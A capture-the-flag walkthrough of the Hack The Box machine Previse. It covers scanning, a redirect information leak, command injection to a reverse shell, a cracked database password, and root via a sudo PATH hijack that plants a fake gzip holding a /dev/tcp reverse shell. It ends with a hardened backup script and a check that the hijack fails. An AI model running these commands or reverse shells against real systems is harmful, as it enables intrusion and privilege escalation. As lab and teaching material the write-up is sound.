Preface
Previse, a target machine picked at random from the HTB arena; let's see if we can do it.
Target address: 10.10.11.104
Information Gathering
Browsing directly to http://10.10.11.104/login.php shows a login box.
Weak passwords and so-called universal passwords (generic login-bypass strings) were tried.
Port scanning
nmap -T4 -sC -sV -p- 10.10.11.104
An fscan scan found two open ports, 22 and 80.
Fingerprint recognition
Vulnerability Exploitation
A nuclei scan reported an OpenSSH user enumeration vulnerability.
Using it, nuclei reported a long list of candidate SSH usernames. None of them play a part in the rest of this walkthrough; this kind of check is timing-based and prone to false positives, so such a list is a set of leads rather than confirmed accounts.
Directory scanning
Directory brute-forcing was done with gobuster; other tools such as ffuf and dirsearch found nothing here.
gobuster dir -w /p12-字典收集/web漏洞/目录fuzz/directory-list-2.3-medium.txt -u http://10.10.11.104/ -x php,html,txt
Among the results with status 200 is nav.php; visiting it shows the site's navigation.
Browsing directly to the pages it links to redirects to login.php, but the server still sends the full page body along with the redirect, so the content is visible when the response is intercepted in Burp.
To register an account, copy the POST request (the form below), save it as a local HTML file with the full request URL in the form's action, and submit it to create the user.
<form role="form" method="post" action="http://10.10.11.104/accounts.php">
    <div class="uk-margin">
        <div class="uk-inline">
            <span class="uk-form-icon" uk-icon="icon: user"></span>
            <input type="text" name="username" class="uk-input" id="username" placeholder="Username">
        </div>
    </div>
    <div class="uk-margin">
        <div class="uk-inline">
            <span class="uk-form-icon" uk-icon="icon: lock"></span>
            <input type="password" name="password" class="uk-input" id="password" placeholder="Password">
        </div>
    </div>
    <div class="uk-margin">
        <div class="uk-inline">
            <span class="uk-form-icon" uk-icon="icon: lock"></span>
            <input type="password" name="confirm" class="uk-input" id="confirm" placeholder="Confirm Password">
        </div>
    </div>
    <button type="submit" name="submit" class="uk-button uk-button-default">CREATE USER</button>
</form>
Log in with the registered user; the account created here is admin1/admin123.
Visit http://10.10.11.104/files.php and download the archive there; it turns out to contain the site's source code.
The source code is as follows:
Analyzing the source shows a command execution vulnerability in logs.php.
Capture the request to http://10.10.11.104/file_logs.php and inject the payload; with nc listening on the local IP, a shell comes back.
Upgrade to an interactive terminal:
python3 -c "import pty;pty.spawn('/bin/bash')"
The database password was found in the source code downloaded earlier.
Check whether it allows a connection to the database:
mysql -uroot -p
show databases;
use previse;
select * from accounts;
The stored password is an MD5-based hash; crack it with john.
The password is ilovecody112235!.
SSH in as m4lwhere and find the first flag.
Privilege Escalation
Next, we need to escalate to the root user.
Run sudo -l to see which commands can be run as root.
The access_backup.sh script has write and execute permissions.
Its content is:
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
The script calls gzip (and date) by bare name, so both are resolved through the caller's PATH. Because it runs as root via sudo, and sudo here lets the caller's PATH through to the script (a fixed secure_path would block this), we only need to put our own gzip earlier in PATH to escalate privileges.
cd /tmp
# Create a file named gzip with a reverse shell as its content
cat > gzip <<'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.16.21/1234 0>&1
EOF
# Make it executable
chmod 777 gzip
# Put the current directory at the front of PATH so the script's bare "gzip" resolves to ours
export PATH=$(pwd):$PATH
# Then run the script through sudo
sudo /opt/scripts/access_backup.sh
The shell connects back successfully and we get the flag.
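A hardened rewrite of access_backup.sh that closes this PATH hijack, added here as an example and not the script from the box: PATH is fixed inside the script before gzip or date run, and a check function plants a harmless decoy gzip at the front of the caller's PATH to confirm it is never invoked. The LOG_DIR, WEB_LOG and BACKUP_DIR overrides are assumptions for the demo so it can run against scratch directories.

```shell
#!/bin/bash
# Hardened access_backup.sh: an added example, not the script from the box.
# The original invokes gzip and date by bare name, so both resolve through the
# caller's PATH (the /tmp/gzip trick above). Here PATH is reset inside the
# function before any command runs, so a caller-controlled PATH is ignored.
set -eu
# Locations default to the originals; the overrides exist only so the function
# can be exercised against scratch directories (an assumption of this example).
LOG_DIR="${LOG_DIR:-/var/log/apache2}"
WEB_LOG="${WEB_LOG:-/var/www/file_access.log}"
BACKUP_DIR="${BACKUP_DIR:-/var/backups}"

backup_logs() {
    export PATH=/usr/bin:/bin   # trusted search path, fixed by the script itself
    umask 077                   # archives readable by their owner only
    local stamp
    stamp="$(date --date="yesterday" +%Y%b%d)"
    gzip -c "$LOG_DIR/access.log" > "$BACKUP_DIR/${stamp}_access.gz"
    gzip -c "$WEB_LOG" > "$BACKUP_DIR/${stamp}_file_access.gz"
    printf '%s\n' "$stamp"      # returned so callers can locate the archives
}

# Regression check for the mitigation: call backup_logs with a harmless decoy
# "gzip" first in the caller's PATH and confirm the decoy never runs and the
# archive is genuine gzip output. Returns 0 on pass, 1 on fail.
check_path_hijack_resistance() {
    local work stamp
    work="$(mktemp -d)"
    mkdir -p "$work/decoy" "$work/logs" "$work/backups"
    printf 'GET /login.php 200\n' > "$work/logs/access.log"   # constructed sample
    printf 'file 1 download\n' > "$work/file_access.log"       # constructed sample
    printf '#!/bin/sh\ntouch "%s/decoy_ran"\n' "$work" > "$work/decoy/gzip"
    chmod 700 "$work/decoy/gzip"
    # Subshell reproduces the attacker's precondition: the decoy leads PATH.
    stamp="$(
        export PATH="$work/decoy:$PATH" LOG_DIR="$work/logs"
        export WEB_LOG="$work/file_access.log" BACKUP_DIR="$work/backups"
        backup_logs
    )"
    if [ -e "$work/decoy_ran" ] ||
       [ "$(gzip -dc "$work/backups/${stamp}_access.gz")" != "GET /login.php 200" ]; then
        rm -rf "$work"; return 1
    fi
    rm -rf "$work"
}

case "${1:-}" in
    --check) check_path_hijack_resistance && echo "decoy gzip was ignored" ;;
    --run)   backup_logs ;;
esac
```

Run with --check to exercise the decoy test, or --run (as root, with the defaults) to perform the real backup.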